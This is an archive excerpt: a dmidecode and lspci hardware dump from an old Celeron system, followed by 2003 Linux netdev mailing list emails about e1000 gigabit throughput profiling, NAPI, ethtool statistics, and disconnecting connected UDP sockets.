Processor Information Socket Designation: PGA 370 Type: Central Processor Family: Celeron Manufacturer: GenuineIntel ID: 8A 06 00 00 FF F9 83 03 Signature: Type 0, Family 6, Model 8, Stepping 10 Flags: FPU (Floating-point unit on-chip) VME (Virtual mode extension) DE (Debugging extension) PSE (Page size extension) TSC (Time stamp counter) MSR (Model specific registers) PAE (Physical address extension) MCE (Machine check exception) CX8 (CMPXCHG8 instruction supported) SEP (Fast system call) MTRR (Memory type range registers) PGE (Page global enable) MCA (Machine check architecture) CMOV (Conditional move instruction supported) PAT (Page attribute table) PSE-36 (36-bit page size extension) MMX (MMX technology supported) FXSR (Fast floating-point save and restore) SSE (Streaming SIMD extensions) Version: Intel Celeron(TM) Processor Voltage: 1.7 V External Clock: 100 MHz Max Speed: 1200 MHz Current Speed: 1100 MHz Status: Populated, Enabled Upgrade: LIF Socket L1 Cache Handle: 0x000A L2 Cache Handle: 0x000B L3 Cache Handle: Not Provided Handle 0x0005 DMI type 5, 24 bytes. Memory Controller Information Error Detecting Method: None Error Correcting Capabilities: Other Supported Interleave: Unknown Current Interleave: Unknown Maximum Memory Module Size: 1024 MB Maximum Total Memory Size: 4096 MB Supported Speeds: 70 ns 60 ns 50 ns Supported Memory Types: DIMM SDRAM Memory Module Voltage: 3.3 V Associated Memory Slots: 4 0x0006 0x0007 0x0008 0x0009 Enabled Error Correcting Capabilities: Unknown Handle 0x0006 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 1 Bank Connections: 0 1 Current Speed: Unknown Type: DIMM SDRAM Installed Size: 128 MB (Single-bank Connection) Enabled Size: 128 MB (Single-bank Connection) Error Status: OK Handle 0x0007 DMI type 6, 12 bytes. 
Memory Module Information Socket Designation: DIMM 2 Bank Connections: 2 3 Current Speed: Unknown Type: DIMM SDRAM Installed Size: 128 MB (Double-bank Connection) Enabled Size: 128 MB (Double-bank Connection) Error Status: OK Handle 0x0008 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 3 Bank Connections: 4 5 Current Speed: Unknown Type: DIMM SDRAM Installed Size: Not Installed (Single-bank Connection) Enabled Size: Not Installed (Single-bank Connection) Error Status: OK Handle 0x0009 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 4 Bank Connections: 6 7 Current Speed: Unknown Type: DIMM SDRAM Installed Size: Not Installed (Single-bank Connection) Enabled Size: Not Installed (Single-bank Connection) Error Status: OK Handle 0x000A DMI type 7, 19 bytes. Cache Information Socket Designation: L1 Cache Configuration: Enabled, Not Socketed, Level 1 Operational Mode: Write Back Location: Internal Installed Size: 32 KB Maximum Size: 32 KB Supported SRAM Types: Pipeline Burst Synchronous Installed SRAM Type: Pipeline Burst Synchronous Speed: Unknown Error Correction Type: Unknown System Type: Data Associativity: 4-way Set-associative Handle 0x000B DMI type 7, 19 bytes. Cache Information Socket Designation: L2 Cache Configuration: Enabled, Not Socketed, Level 2 Operational Mode: Write Back Location: Internal Installed Size: 128 KB Maximum Size: 256 KB Supported SRAM Types: Pipeline Burst Synchronous Installed SRAM Type: Pipeline Burst Synchronous Speed: Unknown Error Correction Type: Unknown System Type: Data Associativity: 4-way Set-associative Handle 0x000C DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: PRIMARY IDE/HDD Internal Connector Type: On Board IDE External Reference Designator: Not Specified External Connector Type: None Port Type: None Handle 0x000D DMI type 8, 9 bytes. 
Port Connector Information Internal Reference Designator: SECONDARY IDE/HDD Internal Connector Type: On Board IDE External Reference Designator: Not Specified External Connector Type: None Port Type: None Handle 0x000E DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: FLOPPY Internal Connector Type: On Board Floppy External Reference Designator: Not Specified External Connector Type: None Port Type: None Handle 0x000F DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: USB1 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x0010 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: USB2 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x0011 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: PS/2 Keybaord External Connector Type: PS/2 Port Type: Keyboard Port Handle 0x0012 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: PS/2 Mouse External Connector Type: PS/2 Port Type: Mouse Port Handle 0x0013 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Parallel Port External Connector Type: DB-25 female Port Type: Parallel Port ECP/EPP Handle 0x0014 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Serial Port External Connector Type: DB-9 male Port Type: Serial Port 16550 Compatible Handle 0x0015 DMI type 8, 9 bytes. 
Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Serial Port 2 External Connector Type: DB-9 male Port Type: Serial Port 16550 Compatible Handle 0x0016 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Video Port External Connector Type: Mini Jack (headphones) Port Type: Video Port Handle 0x0017 DMI type 9, 13 bytes. System Slot Information Designation: PCI 1 Type: 32-bit PCI Current Usage: Available Length: Short ID: 1 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x0018 DMI type 9, 13 bytes. System Slot Information Designation: PCI 2 Type: 32-bit PCI Current Usage: In Use Length: Short ID: 2 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x0019 DMI type 9, 13 bytes. System Slot Information Designation: PCI 3 Type: 32-bit PCI Current Usage: In Use Length: Short ID: 3 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001A DMI type 9, 13 bytes. System Slot Information Designation: PCI 4 Type: 32-bit PCI Current Usage: In Use Length: Short ID: 4 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001B DMI type 9, 13 bytes. System Slot Information Designation: PCI 5 Type: 32-bit PCI Current Usage: Available Length: Short ID: 5 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001C DMI type 9, 13 bytes. System Slot Information Designation: PCI 6 Type: 32-bit PCI Current Usage: Available Length: Short ID: 6 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001D DMI type 9, 13 bytes. 
System Slot Information Designation: AGP Type: 32-bit PCI Current Usage: In Use Length: Short ID: 7 Characteristics: 3.3 V is provided PME signal is supported Handle 0x001E DMI type 11, 5 bytes. OEM Strings String 1: 0 String 2: 0 Handle 0x001F DMI type 13, 22 bytes. BIOS Language Information Installable Languages: 1 en|US|iso8859-1 Currently Installed Language: en|US|iso8859-1 Handle 0x0020 DMI type 14, 14 bytes. Group Associations Name: Cpu Module Items: 3 0x0004 (Processor) 0x000A (Cache) 0x000B (Cache) Handle 0x0021 DMI type 14, 35 bytes. Group Associations Name: Memory Module Set Items: 10 0x0022 (Physical Memory Array) 0x0023 (Memory Device) 0x0028 (Memory Device Mapped Address) 0x0024 (Memory Device) 0x0029 (Memory Device Mapped Address) 0x0025 (Memory Device) 0x002A (Memory Device Mapped Address) 0x0026 (Memory Device) 0x002B (Memory Device Mapped Address) 0x0027 (Memory Array Mapped Address) Handle 0x0022 DMI type 16, 15 bytes. Physical Memory Array Location: System Board Or Motherboard Use: System Memory Error Correction Type: None Maximum Capacity: 1 GB Error Information Handle: Not Provided Number Of Devices: 4 Handle 0x0023 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: 72 bits Data Width: 64 bits Size: 128 MB Form Factor: DIMM Set: 1 Locator: DIMM 1 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0024 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: 72 bits Data Width: 64 bits Size: 128 MB Form Factor: DIMM Set: 2 Locator: DIMM 2 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0025 DMI type 17, 23 bytes. 
Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: 2 Locator: DIMM 3 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0026 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: 2 Locator: DIMM 4 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0027 DMI type 19, 15 bytes. Memory Array Mapped Address Starting Address: 0x00000000000 Ending Address: 0x040000003FF Range Size: 268435457 kB Physical Array Handle: 0x0022 Partition Width: 0 Handle 0x0028 DMI type 20, 19 bytes. Memory Device Mapped Address Starting Address: 0x00000000000 Ending Address: 0x00007FFFFFF Range Size: 128 MB Physical Device Handle: 0x0023 Memory Array Mapped Address Handle: 0x0027 Partition Row Position: 1 Handle 0x0029 DMI type 20, 19 bytes. Memory Device Mapped Address Starting Address: 0x00008000000 Ending Address: 0x0000FFFFFFF Range Size: 128 MB Physical Device Handle: 0x0024 Memory Array Mapped Address Handle: 0x0027 Partition Row Position: 2 Handle 0x002A DMI type 126, 19 bytes. Inactive Handle 0x002B DMI type 126, 19 bytes. Inactive Handle 0x002C DMI type 32, 11 bytes. System Boot Information Status: No errors detected Handle 0x002D DMI type 127, 4 bytes. End Of Table 00:00.0 Host bridge: VIA Technologies, Inc. 
VT82C693A/694x [Apollo PRO133x] (rev c4) Subsystem: Asustek Computer, Inc.: Unknown device 80e7 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 06 11 91 06 06 00 10 22 c4 00 00 06 00 00 00 00 10: 08 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 43 10 e7 80 30: 00 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: fd d8 c8 f6 04 00 10 10 88 00 08 08 0c 10 10 10 60: 0f 2a 00 a0 e6 e6 95 95 41 7c 86 2f 08 6f 00 33 70: c0 88 cc 0c 0e a1 d2 00 01 b4 01 02 00 00 00 02 80: 0f 41 00 00 e0 00 00 00 03 80 f1 0f cc 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 02 c0 20 00 03 02 00 1f 00 00 00 00 6b 02 00 00 b0: 7f 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 01 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 00 00:01.0 PCI bridge: VIA Technologies, Inc. 
VT82C598/694x [Apollo MVP3/Pro133x AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 06 11 98 85 07 00 30 22 00 00 04 06 00 00 01 00 10: 00 00 00 00 00 00 00 00 00 01 01 00 d0 d0 00 00 20: 00 fa d0 fa f0 fa f0 fb 00 00 00 00 00 00 00 00 30: 00 00 00 00 80 00 00 00 00 00 00 00 00 00 08 00 40: c8 cd 00 44 04 72 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 01 00 02 02 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) Subsystem: Asustek Computer, Inc.: Unknown device 80e7 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- TAbort- SERR- TAbort- SERR- TAbort- SERR- [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=1 PME- Capabilities: [e4] PCI-X non-bridge device. 
Command: DPERE- ERO+ RBC=0 OST=0 Status: Bus=0 Dev=0 Func=0 64bit- 133MHz- SCD- USC-, DC=simple, DMMRBC=2, DMOST=0, DMCRS=0, RSCEM- Capabilities: [f0] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 00: 86 80 0c 10 17 00 30 02 02 00 00 02 08 20 00 00 10: 00 00 80 f9 00 00 00 f9 01 a8 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 86 80 12 11 30: 00 00 00 00 dc 00 00 00 00 00 00 00 0a 01 ff 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 01 e4 22 c8 e0: 00 21 00 37 07 f0 02 00 00 00 40 00 00 00 00 00 f0: 05 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00:09.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) Subsystem: 3Com Corporation 3C905B Fast Etherlink XL 10/100 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- [disabled] [size=128K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: b7 10 55 90 17 00 10 02 30 00 00 02 08 20 00 00 10: 01 a4 00 00 00 00 80 f8 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 b7 10 55 90 30: 00 00 00 00 dc 00 00 00 00 00 00 00 07 01 0a 0a 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 f6 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:0a.0 FireWire (IEEE 1394): Texas Instruments TSB12LV23 IEEE-1394 Controller (prog-if 10 [OHCI]) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- TAbort- SERR- 00: 02 10 42 47 87 00 90 02 5c 00 00 03 08 40 00 00 10: 08 00 00 fb 01 d8 00 00 00 00 00 fa 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 02 10 80 00 30: 00 00 fe fa 50 00 00 00 00 00 00 00 ff 00 08 00 40: 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 02 00 10 00 03 02 00 ff 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 From haveblue@us.ibm.com Wed Jul 2 17:56:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 17:56:45 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h630uR2x013011 for ; Wed, 2 Jul 2003 17:56:34 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h630uKXq147674; Wed, 2 Jul 2003 20:56:20 -0400 Received: 
from DYN318089.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h630uIqO253254; Wed, 2 Jul 2003 20:56:18 -0400 Subject: impressive throughput on 2.5.73 From: Dave Hansen To: netdev@oss.sgi.com Cc: Scott Feldman , Nivedita Singhvi Content-Type: text/plain Organization: Message-Id: <1057193766.31286.843.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 17:56:07 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3731 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev I run a little script to load up a gigabit ethernet link between two of my machines: an 8-way PIII web server, and a 4-way PIII client. Both client and server have e1000s. The script fetches a bunch of fairly big files via http from the server, using apache. I'm impressed that it can fill just about the entire gigabit pipe, while using less than 1 of the server's CPUs. 176 requests/sec - 110.0 MB/second - 0.6 MB/request Server CPU breakdown. 2% system 7% user 91% idle I'm not using any interrupt mitigation, so I'm still at ~9k interrupts/sec. I'll try NAPI next. 
server profile: 197212 total 0.1159 175783 poll_idle 2441.4306 1474 alloc_skb 6.8241 1281 skb_release_data 8.6554 1202 skb_clone 3.7563 1038 do_tcp_sendpages 0.3655 998 e1000_clean_tx_irq 2.1886 974 e1000_xmit_frame 0.5148 841 tcp_transmit_skb 0.5729 827 Letext 2.0675 791 __kmalloc 6.3790 739 ip_queue_xmit 0.6415 629 ip_finish_output 1.4976 583 tcp_write_xmit 0.7836 571 tcp_v4_rcv 0.2896 422 schedule 0.2733 417 e1000_intr 3.7232 403 tcp_clean_rtx_queue 0.5140 399 __kfree_skb 2.1685 353 kfree 3.6771 337 kmem_cache_free 4.4342 309 e1000_clean_rx_irq 0.3053 291 find_get_page 6.0625 284 do_softirq 1.4200 246 eth_type_trans 1.4643 233 dev_queue_xmit 0.4380 226 __wake_up 5.1364 216 ip_rcv 0.2093 202 sock_wfree 3.3667 202 memcpy 5.0500 client profile: 33363 total 0.0196 9575 poll_idle 132.9861 5099 __copy_user_intel 32.6859 3307 schedule 2.1418 1753 __wake_up 39.8409 667 tcp_v4_rcv 0.3382 577 pipe_write 0.7970 510 __down_wq 1.7708 488 alloc_skb 2.2593 476 tcp_recvmsg 0.2216 457 tcp_rcv_established 0.2746 457 __kfree_skb 2.4837 405 dnotify_parent 4.5000 382 pipe_read 0.7290 368 system_call 8.3636 350 kill_fasync 7.0000 341 current_kernel_time 5.0147 299 __kmalloc 2.4113 280 ip_rcv 0.2713 252 eth_type_trans 1.5000 245 skb_release_data 1.6554 233 ip_queue_xmit 0.2023 232 kfree 2.4167 228 e1000_clean_rx_irq 0.2253 210 pipe_wait 1.3816 205 e1000_clean_tx_irq 0.4496 200 tcp_transmit_skb 0.1362 199 e1000_xmit_frame 0.1052 -- Dave Hansen haveblue@us.ibm.com From niv@us.ibm.com Wed Jul 2 20:01:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 20:01:46 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6331a2x014325 for ; Wed, 2 Jul 2003 20:01:42 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6331R8w246212; Wed, 2 Jul 2003 23:01:28 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com 
[9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6331QsH179690; Wed, 2 Jul 2003 21:01:27 -0600 Message-ID: <3F039BE1.2080008@us.ibm.com> Date: Wed, 02 Jul 2003 19:58:41 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Dave Hansen CC: netdev@oss.sgi.com, Scott Feldman Subject: Re: impressive throughput on 2.5.73 References: <1057193766.31286.843.camel@nighthawk> In-Reply-To: <1057193766.31286.843.camel@nighthawk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3733 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Dave Hansen wrote: > 176 requests/sec - 110.0 MB/second - 0.6 MB/request > > Server CPU breakdown. > 2% system > 7% user > 91% idle > > client profile: > 33363 total 0.0196 > 9575 poll_idle 132.9861 > 5099 __copy_user_intel 32.6859 > 3307 schedule 2.1418 > 1753 __wake_up 39.8409 > 667 tcp_v4_rcv 0.3382 Nice numbers :). In addition to NAPI, would be nice to stick in more adapters. Any idea why __wake_up should be so expensive on the client side? 
thanks, Nivedita From haveblue@us.ibm.com Wed Jul 2 20:21:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 20:21:22 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h633LB2x016492 for ; Wed, 2 Jul 2003 20:21:18 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h633L4Xq143078; Wed, 2 Jul 2003 23:21:04 -0400 Received: from nighthawk.sr71.net (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h633L241074244; Wed, 2 Jul 2003 23:21:03 -0400 Subject: Re: impressive throughput on 2.5.73 From: Dave Hansen To: Nivedita Singhvi Cc: netdev@oss.sgi.com, Scott Feldman In-Reply-To: <3F039BE1.2080008@us.ibm.com> References: <1057193766.31286.843.camel@nighthawk> <3F039BE1.2080008@us.ibm.com> Content-Type: text/plain Organization: Message-Id: <1057202451.2916.36.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 20:20:52 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3734 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev On Wed, 2003-07-02 at 19:58, Nivedita Singhvi wrote: > Nice numbers :). In addition to NAPI, would be nice to > stick in more adapters. Any idea why __wake_up should be > so expensive on the client side? NAPI seems to degrade throughput down to ~80MB/sec, but the interrupt rate doesn't change. I'm going to put some debugging in and make sure that it's kicking in properly. 
-- Dave Hansen haveblue@us.ibm.com From shibu_lkml@yahoo.com Wed Jul 2 20:16:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 20:27:14 -0700 (PDT) Received: from web20704.mail.yahoo.com (web20704.mail.yahoo.com [216.136.226.177]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h633GA2x016453 for ; Wed, 2 Jul 2003 20:16:11 -0700 Message-ID: <20030703031610.79050.qmail@web20704.mail.yahoo.com> Received: from [202.54.26.201] by web20704.mail.yahoo.com via HTTP; Wed, 02 Jul 2003 20:16:10 PDT Date: Wed, 2 Jul 2003 20:16:10 -0700 (PDT) From: Shibu LKML Subject: Disconnecting a connected UDP socket To: netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-572335396-1057202170=:79043" X-archive-position: 3735 X-Approved-By: ralf@linux-mips.org X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shibu_lkml@yahoo.com Precedence: bulk X-list: netdev --0-572335396-1057202170=:79043 Content-Type: text/plain; charset=us-ascii Hi, I am wondering if Linux supports disconnecting a connected UDP socket. The manpage for connect lists it in the BUGS section. It says disconnect is still not supported. I was wondering if it involves more than adding the following lines to udp_connect in udp.c if (usin->sin_family == AF_UNSPEC) return udp_disconnect(sk, 0); (just above sk_dst_reset(sk)) Will this fix the problem for IPV4 stuff? Regards Shibu --------------------------------- Do you Yahoo!? SBC Yahoo! DSL - Now only $29.95 per month! --0-572335396-1057202170=:79043 Content-Type: text/html; charset=us-ascii
--0-572335396-1057202170=:79043-- From haveblue@us.ibm.com Wed Jul 2 21:50:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 21:50:50 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h634of2x017532 for ; Wed, 2 Jul 2003 21:50:41 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h634oYDG174726; Thu, 3 Jul 2003 00:50:34 -0400 Received: from nighthawk.sr71.net (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h634oYl4116652; Wed, 2 Jul 2003 22:50:34 -0600 Subject: RE: impressive throughput on 2.5.73 From: Dave Hansen To: Scott Feldman Cc: netdev@oss.sgi.com, Nivedita Singhvi In-Reply-To: References: Content-Type: text/plain Organization: Message-Id: <1057207823.2916.87.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 21:50:23 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3737 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev On Wed, 2003-07-02 at 21:41, Feldman, Scott wrote: > How many TSO per/second are you doing? > > # watch "ethtool -S ethX | grep tx_tcp_seg" Hmmm. My ethtool doesn't have a "-S", only "-s". Is it too ancient? 
